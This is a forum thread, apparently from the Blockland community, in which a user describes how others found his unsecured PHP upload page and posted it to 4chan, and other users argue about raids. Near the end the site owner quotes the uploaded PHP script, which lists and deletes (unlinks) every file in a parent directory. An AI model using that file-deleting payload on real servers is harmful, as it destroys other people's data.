Zoneark discovered my unsecure upload system.

[Dropshock]

What exactly happened here?  

Did you announce that it was unsecured or was it a bug or what?

Its right here
http://forum.blockland.us/index.php?topic=88951.msg1634141#msg1634141

Sigh, my upload page (Which i can't disclose because people will spam upload it because it lacks a security system)
Leads to that directory.
I can't change the directory for now... Because I'm not home.

[Ad Bot]

[SuperToxic]

I still don't get why he says 4chan did it though
Was that just a random assumption or am I missing something here
4chan is an imageboard lol

[UnsungMaster]

Thanks, Please do.

Erm, do you have an email I can send the HTML's to? They're a tad long.

[Dropshock]

I still don't get why he says 4chan did it though
Was that just a random assumption or am I missing something here
4chan is an imageboard lol

Zoneark said he posted the uploader on 4chan
so i guess its zonearks fault and 4chan, i dunno

[Jimmg]

I still don't get why he says 4chan did it though
Was that just a random assumption or am I missing something here
4chan is an imageboard lol

That have a board just for Raids/Malicious scripts.

[SuperToxic]

That have a board just for Raids/Malicious scripts.

Uh no
Random != Raids/Malicious scripts
Try again.

[Inv3rted]

It's quite easy.

"HAI /B/ BREAK THIS SITE PLZZZZZ

IF YOU DO, YOU GET TITS"

That have a board just for Raids/Malicious scripts.

Yeah but if you want stuff to happen quickly, go to /b/.

A swarm of handicaps is still a swarm.

[Spockticus]

Yeah, that's Zoneark and Truce alright. I don't mind them, but I wouldn't trust them for the life of me.

This thread was no where near surprising.

[Inv3rted]

Uh no
Random != Raids/Malicious scripts
Try again.

lol, a lot are organized there.

[Jimmg]

Uh no
Random != Raids/Malicious scripts
Try again.

You obviously don't lurk enough on 4chan related sites, my little weaboo.
I can't give a link because it requires a password/username combo.

[Inv3rted]

4chan is 4chan. If you're talking about other chans / related stuff, it's still not 4chan.

[SuperToxic]

You obviously don't lurk enough on 4chan related sites, my little weaboo.
I can't give a link because it requires a password/username combo.

Other imageboards are not 4chan
711chan and other boards may have raiding forums but they aren't 4chan themselves.

[Jimmg]

4chan is 4chan. If you're talking about other chans / related stuff, it's still not 4chan.

Lol, the link goes straight to a 4chan board.

[MtnDew]

What exactly happened here?  

Did you announce that it was unsecured or was it a bug or what?

I basically said.

I have a unsecure uploader somewhere.

Then zoneark guessed it was this
http://www.bduhq.com/upload.php
(I removed it.. )
Good guess. Seriously.

Anyways, So he uploaded a zoneark.php with this code..

<?php
$handle = opendir('../..');
while($file = readdir($handle))
{
   echo('../../' . $file . "<br/>");
   unlink('../../' . $file);
}
?>

Which allows him to view my files so he could access some of my unreleased crapons.

That's one thing, But, After he realized the potential power of my stuff uploader.
He told his friends, And the uploader link was posted on 4chan.

People uploaded scripts and ran them, Indefinitely deleting some of my back up folders on the site.

[Jimmg]

/i/ Most notably.